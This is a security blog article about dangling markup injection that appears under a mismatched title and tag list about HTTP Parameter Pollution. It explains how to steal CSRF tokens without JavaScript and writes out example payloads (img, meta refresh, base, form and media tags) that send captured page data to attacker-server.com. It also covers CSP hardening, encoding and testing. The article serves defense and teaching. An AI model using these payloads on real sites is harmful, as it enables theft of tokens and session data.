Security
14 min read
108 views

HTTP Parameter Pollution: Making Servers Disagree on What You Sent 🔀

IT
InstaTunnel Team
Published by our engineering team
HTTP Parameter Pollution: Making Servers Disagree on What You Sent 🔀

Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

Introduction

In the constantly evolving landscape of web application security, attackers continually develop sophisticated techniques to circumvent protective measures. While Content Security Policy (CSP) and robust input filtering have become increasingly effective at preventing traditional Cross-Site Scripting (XSS) attacks, a subtle yet powerful exploitation method called Dangling Markup Injection offers adversaries an alternative pathway to exfiltrate sensitive data without executing any JavaScript code.

This attack technique leverages fundamental browser behavior and HTML parsing mechanisms to capture confidential information, including CSRF tokens, session identifiers, authentication credentials, and personal data. What makes dangling markup injection particularly dangerous is its ability to operate in environments where script execution is completely blocked, bypassing many modern security controls that developers rely upon.

What is Dangling Markup Injection?

Dangling markup injection is a data exfiltration technique that captures information cross-domain in situations where full cross-site scripting attacks aren’t possible. Unlike conventional XSS attacks that require JavaScript execution, dangling markup exploits the way browsers parse incomplete HTML tags and attributes.

The attack works by injecting HTML markup that intentionally leaves tags or attributes unclosed—hence the term “dangling.” When browsers encounter these incomplete elements, they implement lenient parsing based on the HTML5 specification, which prioritizes user experience over strict syntax enforcement. Rather than throwing an error, browsers treat all following text as part of the unclosed tag or attribute until they encounter the appropriate closing delimiter.

The Core Mechanism

Consider a vulnerable application that embeds user-controllable data into its responses without proper sanitization:

<input type="text" name="user_input" value="CONTROLLABLE_DATA_HERE">

If the application doesn’t properly filter or escape characters like > or ", an attacker can inject incomplete HTML that fundamentally alters how the browser interprets the subsequent page content. The browser’s permissive parsing behavior becomes the attacker’s weapon, transforming legitimate page markup into exfiltrated data.

How Browser Parsing Enables the Attack

Modern browsers implement lenient HTML parsing mechanisms designed to handle malformed markup gracefully. This design decision, while improving user experience on poorly-coded websites, creates a security vulnerability that dangling markup injection exploits.

When a browser encounters an unclosed attribute, it continues scanning forward through the document until it finds the matching closing delimiter. Everything between the injection point and that delimiter becomes part of the attribute value—even if that content includes sensitive tokens, form data, or other confidential information that was never intended to be exposed.

The browser ignores any recurrence of the opening delimiter it encounters during this scan, focusing solely on finding the closing character. This behavior allows attackers to essentially “capture” arbitrary portions of the HTML document and transmit them to attacker-controlled servers through standard HTML mechanisms like image requests or form submissions.

Basic Attack Vectors

Image Source Injection

The most common and straightforward dangling markup attack uses an image tag with an intentionally unclosed src attribute:

"><img src='https://attacker-server.com/?

When this payload is injected into a vulnerable parameter, the browser begins parsing the src attribute value and continues until it encounters the next single quote in the HTML document. Everything captured between the injection point and that quote—including CSRF tokens, session data, or user information—gets URL-encoded and transmitted to the attacker’s server as part of the image request.

For example, if the injection occurs before a CSRF token:

"><img src='https://attacker-server.com/?
<input type="hidden" name="csrf_token" value="a3f8d92b4e1c">

The resulting request to the attacker’s server would include the CSRF token in the URL query string, allowing the attacker to capture it without any JavaScript execution.

Meta Refresh Redirection

Attackers can also exploit the <meta> tag’s http-equiv attribute to perform redirections while capturing data:

<meta http-equiv="refresh" content="0; url=https://attacker-server.com/?

This technique redirects the user’s browser to an attacker-controlled server, sending all captured markup as part of the URL. The attack is particularly effective because meta refresh redirections are often permitted by CSP policies that block other exfiltration methods.

Base Tag Target Manipulation

A more sophisticated approach involves the <base> tag’s target attribute, which changes the default target window for all links on the page:

<base target='https://attacker-server.com/?

This attack leverages the window.name property, which is accessible cross-domain. When users click any link on the compromised page, the incomplete target attribute causes the browser to set the window name to all the markup between the injection point and the next quote. The attacker can then read this data from the opened window, even across different domains.

Form Hijacking

Attackers can inject a new form tag or manipulate existing forms to redirect submitted data:

<form action='https://attacker-server.com/capture'>

By injecting an unclosed form element before the legitimate form, the attacker causes all subsequent input fields—including those containing CSRF tokens or sensitive user data—to be associated with the attacker’s form. When users submit what they believe is the legitimate form, the data goes directly to the attacker’s server.

Advanced Exploitation Techniques

Iframe Name Exfiltration

Sophisticated attackers can abuse the iframe name attribute to create recursive data leakage:

<iframe src="//vulnerable-site.com/page?param="><iframe name='" onload="exfiltrate(this)">

This technique creates nested iframes where the inner iframe’s name attribute captures sensitive markup, which can then be accessed and exfiltrated by the outer iframe’s event handlers.

Input Value Injection

Another advanced method involves injecting hidden input fields that capture everything until the next closing quote:

<input type="hidden" name="captured_data" value="

All content following this injection—including CSRF tokens, user data, or session information—becomes the value of this hidden field. If the attacker can trigger a form submission, this data gets sent to wherever the form points.

Audio and Video Elements

Similar to image tags, audio and video elements can be exploited for data exfiltration:

<audio src='https://attacker-server.com/?
<video src='https://attacker-server.com/?

These tags make HTTP requests to load media resources, allowing attackers to capture markup in their URLs just like with image elements.

Stealing CSRF Tokens: The Primary Target

The most critical application of dangling markup injection involves stealing CSRF tokens. These tokens are designed to protect against cross-site request forgery attacks by ensuring that state-changing requests originate from legitimate sources. They’re typically implemented as hidden form fields or custom headers containing unpredictable values that must be included with sensitive requests.

CSRF tokens are particularly vulnerable to dangling markup injection because:

  1. Strategic Placement: Tokens are often placed in hidden form fields immediately adjacent to user-controllable input fields
  2. Predictable Format: They typically appear as HTML attribute values enclosed in quotes
  3. High Value: Once captured, a valid CSRF token allows attackers to perform authenticated actions on behalf of the victim
  4. Session Association: Captured tokens are tied to active user sessions, giving attackers a limited but critical window for exploitation

Attack Workflow for CSRF Token Theft

A typical CSRF token theft via dangling markup follows this pattern:

  1. Reconnaissance: The attacker identifies an injection point in a page that also contains CSRF tokens
  2. Payload Crafting: They create a dangling markup payload that will capture the token
  3. Delivery: The malicious payload is delivered via reflected input, stored content, or URL parameters
  4. Token Capture: When the victim loads the compromised page, their browser sends the token to the attacker’s server
  5. Token Exploitation: The attacker uses the captured token to perform unauthorized actions within the victim’s session

Once an attacker obtains a valid CSRF token, they can:

  • Modify user account settings (email, password, security questions)
  • Perform financial transactions in the victim’s name
  • Change access permissions or elevate privileges
  • Post content or send messages as the victim
  • Delete or modify user data
  • Perform any state-changing action the application allows

Why Traditional Defenses Fail

Cross-Site Scripting (XSS) Filters

Modern applications often employ XSS filters that detect and block obvious script injection attempts. These filters look for patterns like <script>, javascript:, onerror=, and other common XSS vectors. However, dangling markup injection circumvents these protections because:

  • No Script Execution: The attack uses legitimate HTML elements like <img>, <meta>, and <form> without any JavaScript
  • Benign Appearance: Individual injected tags appear harmless to filters focused on blocking executable code
  • Subtle Syntax: The attack’s power comes from what’s NOT included (closing quotes) rather than malicious content
  • Context-Dependent: The dangerous behavior emerges from browser parsing, not from the injected content itself

Content Security Policy (CSP)

CSP is designed to prevent XSS by controlling which resources can be loaded and executed. However, many CSP implementations leave applications vulnerable to dangling markup injection:

Permissive Image Loading: While CSP policies often block script execution with script-src 'none', they frequently allow image loading to preserve website functionality. A policy like:

Content-Security-Policy: default-src 'self'; script-src 'none'

This policy successfully blocks JavaScript execution but doesn’t prevent <img> tags from making requests to external servers, enabling basic dangling markup attacks.

Form Submissions: Many CSP policies don’t restrict form actions, allowing attackers to use form hijacking techniques even in CSP-protected environments.

Meta Tag Limitations: Some CSP implementations don’t adequately restrict <meta> tags with http-equiv attributes, enabling redirect-based exfiltration.

User Interaction Bypass: Even the most restrictive CSP policies can be circumvented using techniques that require minimal user interaction, such as base target manipulation or clickable elements.

Input Validation

Standard input validation often fails to prevent dangling markup injection because:

  • Incomplete Blocking: Validators may allow angle brackets or quotes in specific contexts
  • Encoding Bypass: Different encoding schemes can circumvent simple blacklists
  • Context Confusion: What’s safe in one context (like inside a text node) becomes dangerous in an attribute value
  • Length Limitations: Even shortened payloads can be effective for exfiltration

Real-World Attack Scenarios

Social Media Platforms

Social media applications frequently allow limited HTML in user-generated content such as comments, posts, and profile biographies. Insufficient sanitization in these features has led to dangling markup vulnerabilities where attackers:

  • Injected persistent dangling markup in profile comments that affected all visitors
  • Captured authentication tokens from victim profiles viewing compromised content
  • Created self-propagating attacks where compromised accounts automatically infected others
  • Harvested user data including email addresses, session identifiers, and private information

E-Commerce Applications

Online shopping platforms have been exploited using dangling markup to capture sensitive financial information:

  • Checkout pages with insufficient input sanitization allowed address field injection
  • Credit card information visible in HTML markup was exfiltrated through dangling image tags
  • Order confirmation pages leaked full transaction details including billing addresses
  • Shopping cart data was captured and transmitted to attacker-controlled servers

Enterprise Web Applications

Corporate applications with complex authentication flows have suffered from dangling markup vulnerabilities:

  • Single Sign-On (SSO) implementations with magic link authentication were compromised
  • Administrative panels leaked CSRF tokens through vulnerable email parameters
  • Customer relationship management systems exposed sensitive client data
  • Internal tools with weak input validation allowed persistent token theft affecting all users

Email-Based Attacks

A particularly sophisticated attack vector involves compromising email parameter handling:

  1. An attacker identifies an email notification feature with insufficient sanitization
  2. They inject dangling markup into the email recipient field
  3. The system generates an email containing the payload
  4. When the recipient views the email in a web-based client, the dangling markup captures adjacent sensitive data
  5. This data (often authentication tokens or session identifiers) gets exfiltrated to the attacker’s server

Browser Mitigations and Evolution

Recognizing the severity of dangling markup injection, browser vendors have begun implementing countermeasures, though these protections remain incomplete.

Chromium’s Approach

Chrome and Chromium-based browsers have implemented dangling markup injection mitigations that prevent certain tags from defining URLs containing raw characters such as angle brackets, newlines, and other problematic characters. These protections have been active in Chromium for approximately six years and are being formally incorporated into the HTML specification.

However, as recently as 2022, security researchers discovered bypasses in these protections. Specifically, when Chromium browsers upgraded in-page URLs from HTTP to HTTPS, the dangling markup injection safeguards were bypassed, allowing attackers to exfiltrate sensitive information using HTTP-scheme URLs that would be automatically upgraded.

Specification Updates

As of 2024, efforts are underway to formally add dangling markup injection mitigation to the HTML specification through the WHATWG. These updates introduce new algorithms:

  • Check Dangling Markup Algorithm: Validates URLs before parsing
  • HTML-Parse a URL Algorithm: Calls the dangling markup check before standard URL parsing
  • HTML-Encoding-Parsing-and-Serialize a URL: Incorporates dangling markup protections throughout the URL handling pipeline

Browser vendors including Mozilla (Firefox) and Apple (WebKit/Safari) are implementing these mitigations based on the updated specification.

Current Browser Support

Browser support for dangling markup mitigations varies:

  • Chrome/Edge/Opera: Implemented protections for approximately six years, though bypasses have been discovered
  • Firefox: Implementation in progress following the 2024 specification updates
  • Safari: Existing partial protections with ongoing improvements
  • Mobile Browsers: Generally inherit protections from their desktop counterparts but may lag in updates

Comprehensive Defense Strategies

Defending against dangling markup injection requires a multi-layered approach combining input sanitization, output encoding, security headers, and architectural decisions.

Input Sanitization and Output Encoding

Strict Input Validation: Implement allowlist-based validation that only permits explicitly safe characters in user input. For attribute values, this typically means alphanumeric characters and a very limited set of special characters.

Context-Aware Output Encoding: Apply different encoding schemes based on where user data appears in the HTML document: - HTML entity encoding for text nodes - JavaScript encoding for script contexts - URL encoding for URL parameters - Attribute encoding for attribute values

Quote Management: Always use double quotes for attribute values and ensure they’re properly escaped in any user-controlled content.

Content Security Policy Hardening

Implement restrictive CSP policies that minimize dangling markup attack surface:

Content-Security-Policy: 
  default-src 'none';
  img-src 'self';
  form-action 'self';
  base-uri 'none';

This policy: - Blocks all external resources by default - Restricts images to same-origin only - Prevents forms from submitting to external domains - Completely disables the <base> tag to prevent target attribute exploitation

Additional CSP Directives: Consider adding require-trusted-types-for 'script' to enforce Trusted Types, further reducing injection risks.

CSRF Token Protection Beyond Dangling Markup

While dangling markup can steal tokens, additional layers prevent exploitation:

SameSite Cookies: Set session cookies with SameSite=Strict or SameSite=Lax attributes to prevent them from being sent with cross-site requests.

Custom Headers: Require custom headers (like X-CSRF-Token) that cannot be set by HTML forms or simple cross-origin requests.

Double Submit Cookie Pattern: Use cryptographically signed tokens that bind the CSRF token to the user’s session, making stolen tokens useless without the corresponding session cookie.

Short-Lived Tokens: Implement token expiration to minimize the exploitation window if a token is captured.

Architectural Defenses

Separation of Concerns: Keep sensitive operations in separate domains or subdomains with isolated authentication, making cross-domain exfiltration more difficult.

API-First Design: Use JSON APIs with proper CORS policies instead of traditional HTML form submissions, reducing the attack surface for markup injection.

Framework Security Features: Leverage built-in security features of modern frameworks like React, Angular, or Vue.js, which provide automatic XSS protection and safe templating.

Monitoring and Detection

Implement security monitoring to detect potential dangling markup attacks:

  • Anomalous Outbound Requests: Monitor for unusual patterns in image, video, or audio requests
  • Parameter Inspection: Flag requests containing partially formed HTML tags in user input
  • WAF Rules: Deploy Web Application Firewall rules that detect dangling markup patterns
  • Security Scanning: Regularly scan applications with tools that specifically test for dangling markup vulnerabilities

Testing for Dangling Markup Vulnerabilities

Security professionals and developers should actively test for these vulnerabilities using systematic approaches.

Manual Testing Methodology

  1. Identify Injection Points: Find all locations where user input is reflected in HTML output
  2. Test for Quote Escaping: Submit payloads containing quotes and angle brackets to see if they’re properly escaped
  3. Inject Dangling Payloads: Try basic dangling markup payloads like "><img src='//attacker.com/?
  4. Monitor Requests: Use browser developer tools or proxy tools like Burp Suite to observe if data is being sent to external servers
  5. Verify Data Capture: Check if sensitive information (tokens, session data) appears in the captured requests

Automated Scanning

Several tools can help identify dangling markup vulnerabilities:

  • Burp Suite Professional: Includes scanning capabilities for HTML injection and dangling markup
  • OWASP ZAP: Can be configured with custom scan rules to detect these vulnerabilities
  • Custom Scripts: Develop targeted scripts that systematically test injection points with dangling markup payloads

Penetration Testing Scenarios

During penetration tests, security researchers should:

  • Test all input fields, URL parameters, and headers for injection possibilities
  • Examine pages containing CSRF tokens or other sensitive data
  • Verify CSP effectiveness against dangling markup techniques
  • Test different browser versions to identify implementation-specific vulnerabilities
  • Attempt bypass techniques when mitigations are detected

The Future of Dangling Markup Attacks

As browsers continue implementing mitigations and the HTML specification evolves to formalize protections, the landscape of dangling markup injection continues to change.

Evolving Attack Techniques

Attackers continually discover new bypasses and variations:

  • DOM-based dangling markup using client-side JavaScript to inject payloads
  • Timing-based attacks that exploit race conditions in mitigation implementations
  • Encoding bypasses that circumvent character restrictions
  • Mobile browser-specific techniques leveraging implementation differences

Emerging Defenses

The security community is developing enhanced protections:

  • Trusted Types: Browser APIs that enforce safe handling of dangerous sinks
  • Sanitizer API: Native browser sanitization that provides consistent, secure HTML cleaning
  • Enhanced CSP: New CSP directives specifically targeting injection attacks
  • Framework Evolution: Modern frameworks building in additional protections by default

Conclusion

Dangling markup injection represents a sophisticated class of web vulnerabilities that bypasses many traditional security controls by exploiting fundamental browser behavior rather than requiring script execution. Its ability to exfiltrate sensitive data—particularly CSRF tokens—without triggering XSS filters or violating permissive CSP policies makes it a persistent threat to web application security.

Understanding this attack technique is crucial for developers, security professionals, and penetration testers. While browsers are implementing mitigations and specifications are evolving, the technique remains effective against many production applications, particularly those relying solely on XSS prevention or basic CSP policies for protection.

Effective defense requires a comprehensive, defense-in-depth approach: strict input validation and output encoding, hardened CSP policies, architectural security decisions, robust CSRF token protection, and continuous monitoring for suspicious activity. As the web security landscape continues evolving, staying informed about techniques like dangling markup injection and their countermeasures remains essential for maintaining secure web applications.

The relationship between usability and security creates inherent tension in web development. Allowing rich HTML content improves user experience but expands attack surfaces. Organizations must carefully evaluate their risk tolerance and implement security controls proportional to the sensitivity of the data they protect. By understanding dangling markup injection deeply and implementing comprehensive defenses, organizations can significantly reduce their exposure to this subtle but dangerous attack vector while preserving the functionality users expect from modern web applications.

Keywords: dangling markup injection, CSRF token theft, HTML injection attack, no-JavaScript exfiltration, browser parsing vulnerability, incomplete HTML tags, CSP bypass, XSS filter evasion, session token leakage, web application security, attribute injection, cross-site data exfiltration, dangling markup defense, HTML parsing exploit, CSRF protection bypass

Related Topics

#HTTP Parameter Pollution, HPP, parameter pollution, duplicate query parameters, duplicate POST parameters, query string ambiguity, parameter parsing differences, multi-value parameter attack, param collision attack, WAF bypass HPP, WAF evasion parameter pollution, request smuggling vs HPP, parameter smuggling, form data collision, REST API parameter pollution, GraphQL parameter confusion, header parameter collision, parameter precedence differences, server disagreement on params, framework parsing differences, PHP parameter parsing, Java servlet parameter parsing, .NET parameter parsing, Node.js parameter parsing, Go param handling, ambiguous request parsing, security filters bypass, input validation bypass, authentication bypass HPP, session fixation HPP, CSRF bypass via HPP, cache poisoning via parameter differences, CDN cache key confusion, canonicalization for params, normalize parameters, single-value parameter policy, canonical query string, HPP detection, automated HPP scanner, pentesting HPP, Burp HPP testing, fuzzing duplicate params, namespaced parameter attack, array parameter exploitation, repeated param exploitation, hidden form field collision, double-encoded parameters, percent-encoded param confusion, mixed content type param attack, multipart/form-data parameter pollution, logging inconsistency attack, parameter-based access control bypass, OWASP HPP, secure parameter handling, parameter canonicalization best practices, deny duplicate parameters, prefer safe parsing order, API gateway parameter normalization, signature bypass HPP, normalization and validation pipeline, HPP 2025

Share this article

Share on XShare on LinkedIn

More InstaTunnel Insights

Discover more tutorials, tips, and updates to help you build better with localhost tunneling.

Browse All Articles